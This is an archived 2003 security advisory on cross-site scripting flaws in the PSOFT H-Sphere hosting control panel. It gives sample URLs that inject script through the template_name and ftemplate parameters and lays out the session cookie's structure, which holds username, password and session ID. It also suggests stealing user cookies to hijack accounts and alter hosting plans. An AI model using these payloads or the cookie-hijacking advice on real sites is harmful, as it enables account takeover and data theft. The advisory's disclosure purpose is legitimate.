('binary' encoding is not supported, stored as-is) -------------------- Product: PSOFT H-Sphere ( Hosting Control Panel ) Vendor: PSOFT ( Positive Software Corporation ) Versions: VULNERABLE - 2.3.x - 2.2.x - 2.1.x - 2.0.x NOT VULNERABLE - ? --------------------- Description: H-Sphere is a scalable multiserver webhosting control panel, which provides complete hosting automation for Linux, BSD & Win2000 platforms, is easy to use, and has extensive user interface, billing solution, and integrated trouble tickets system ----------------------------------------- SECURITY HOLES FOUND and PROOFS OF CONCEPT: ----------------------------------------- I encountered a lot of XSS ( Cross Site Scripting ) vulnerabilities in the PSOFT's product called H-Sphere , located in the template inclusion system. The failure is in the form that the template system includes a html template page, if the page does not exist the system prints an error like this: Unknown template : '[PATH TO NON EXISTENT TEMPLATE PAGE]' with this you can insert html and script code by url command passing like this: http://[TARGET]/[PATH TO PSOFT H-SPHERE INSTALLATION]/servlet/psoft.hsphere.CP/[VALID AND LOGGED USER]/[ID]/[PATH OF H-SPHERE USER SCRIPTS]/servlet/psoft.hsphere.CP?template_name=[HERE COMES YOUR CODE] The new error page prints this: Unknown template : '[HERE COMES YOUR CODE]' And the user web navigator executes all the code and scripts included in the new error page. This can be used for steal user cookies like this: MACTOKEN=[USER]|0000000xxxxxx|0xxxxx0000xxxx0000xxxx0000xxxx00 ESTRUCTURE OF H-SPHERE COOKIE : MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ] You can modify your cookie of h-sphere according the stealed user cookie and use the system with the user credentials , think in modify user hosting plans... ;-) . Please , all the time the user must be logged in valid or the attacker must use a specially crafted url for include commands in the client side trought the template system.I think in some public urls... -------------- SAMPLES -------------- http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP? action=login&ftemplate=[MORE CODE AND XSS]&requestURL="><h1>XSS%20in% 20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&password=[PASSWORD] http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/ [ID]/psoft.hsphere.CP?template_name=<H1>xss</H1> http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/ [ID]/psoft.hsphere.CP?template_name=<IFRAME> http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/ [ID]/psoft.hsphere.CP?template_name=<h1>XSS http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/ [ID]/psoft.hsphere.CP?template_name=<script>alert (document.cookie);</script> All urls that use the template and ftemplate / template_name url input are affected by this type of XSS attack . ------------------------- | CONCLUSIONS AND NOTES | ------------------------- All the urls that use this template incluion input are affected by this hole. User data and cookies can be stoolen by this without permission. In some conditions we can pass server-based commands. The server can pick up sending specially crafted urls and input values . We can enter other-user domain configurations passing an specific domain id value. - I test this in the official psoft demo and run but recently they change the demo and don't allow me to enter the system. The system says a Generic Error . ;-). ----------- | CONTACT | ----------- Lorenzo Manuel Hernandez Garcia-Hierro --- Computer Security Analyzer --- --Nova Projects Professional Coding-- PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ********************************** www.novappc.com security.novappc.com www.lorenzohgh.com ______________________
This archive was generated by hypermail 2b30 : Mon Jun 09 2003 - 13:58:31 PDT